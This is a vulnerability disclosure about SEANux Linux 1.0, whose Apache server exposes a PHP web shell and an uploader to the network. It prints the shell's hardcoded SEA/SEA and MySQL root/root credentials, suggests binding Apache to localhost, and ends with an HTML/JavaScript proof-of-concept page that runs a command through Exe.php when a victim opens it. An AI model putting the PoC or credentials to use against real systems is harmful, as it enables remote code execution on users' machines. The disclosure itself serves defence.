Title:SEANux Linux v1.0 Remote Web Shell Access VulnerabilityThe tools appear to be developed in PHP & Perl and are web based. These tools are served through a local apache instance running on the desktop system the apache webserver listening on 0.0.0.0:80 allowing remote access to all of the tools in their catalog. These tools allow remote command execution and file uploads, it was the intent of the SEA to have these only accessable to the local user. The SEA is planning on fixing this vulnerability during their next release. A quick fix would be to modify /etc/apache2/ports.conf and bind apache to localhost: # cat ports.conf |grep -n 127 8:NameVirtualHost 127.0.0.1:80 9:Listen 127.0.0.1:80 This will prevent general network access to the scripts pre-loaded in the web root, but won't help with Javascript payloads embedded in webpages like the PoC I provided below. root@larry-VirtualBox:/etc/mysql# netstat -an Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 127.0.0.1:6010 0.0.0.0:* LISTEN tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN tcp 0 0 127.0.1.1:53 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN tcp 0 0 192.168.0.33:22 192.168.0.22:53474 ESTABLISHED tcp6 0 0 ::1:6010 :::* LISTEN tcp6 0 0 :::80 :::* LISTEN tcp6 0 0 :::22 :::* LISTEN tcp6 0 0 ::1:631 :::* LISTEN tcp6 1 0 ::1:57375 ::1:631 CLOSE_WAIT udp 0 0 0.0.0.0:68 0.0.0.0:* udp 0 0 0.0.0.0:52375 0.0.0.0:* udp 0 0 0.0.0.0:5353 0.0.0.0:* udp 0 0 0.0.0.0:41938 0.0.0.0:* udp 0 0 0.0.0.0:31229 0.0.0.0:* udp 0 0 127.0.1.1:53 0.0.0.0:* udp6 0 0 :::37598 :::* udp6 0 0 :::5353 :::* udp6 0 0 :::12590 :::* udp6 0 0 :::52638 :::* udp6 0 0 :::546 :::* Active UNIX domain sockets (servers and established) This apache server is a tool server hosting web based tools by the SEA one of the tools is a web shell to the system The path http://192.168.0.33/tools/sea.php is a webshell, meant to be accessable only locally but due to a misconfiguration is available remotely. From lines 6-15 contain the credentials sea.php: 6 $user = 'SEA'; 7 $pass = 'SEA'; 8 $uselogin = 1; 9 $sh3llColor = "#0040FF"; 10 11 # MySQL Info --------- 12 $DBhost = "localhost"; 13 $DBuser = "root"; 14 $DBpass = "root"; 15 #--------------------- Looks like an uploader script too at http://192.168.0.33/tools/uploader.php<!-- PoC for http://www.vapid.dhs.org/blog/01-23-2015/ Larry W. Cashdollar @_larry0 2/9/2015 --!> <html> <head> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script> <script> $(document).ready(function(){ $.post("http://localhost/tools/Exe.php", { cmd: "touch /tmp/hello", execute: "Execute" }, function(data,status){ alert("Data: " + data + "\nResult: " + status); }); }); </script> </head> <body> <h2> Hello! You just executed the "touch /tmp/hello" command as www-data on your SEANux 1.0 installation. </h2> <hr> <br> <a href="http://www.vapid.dhs.org/blog/01-23-2015/">Details Here</a> </body> </html>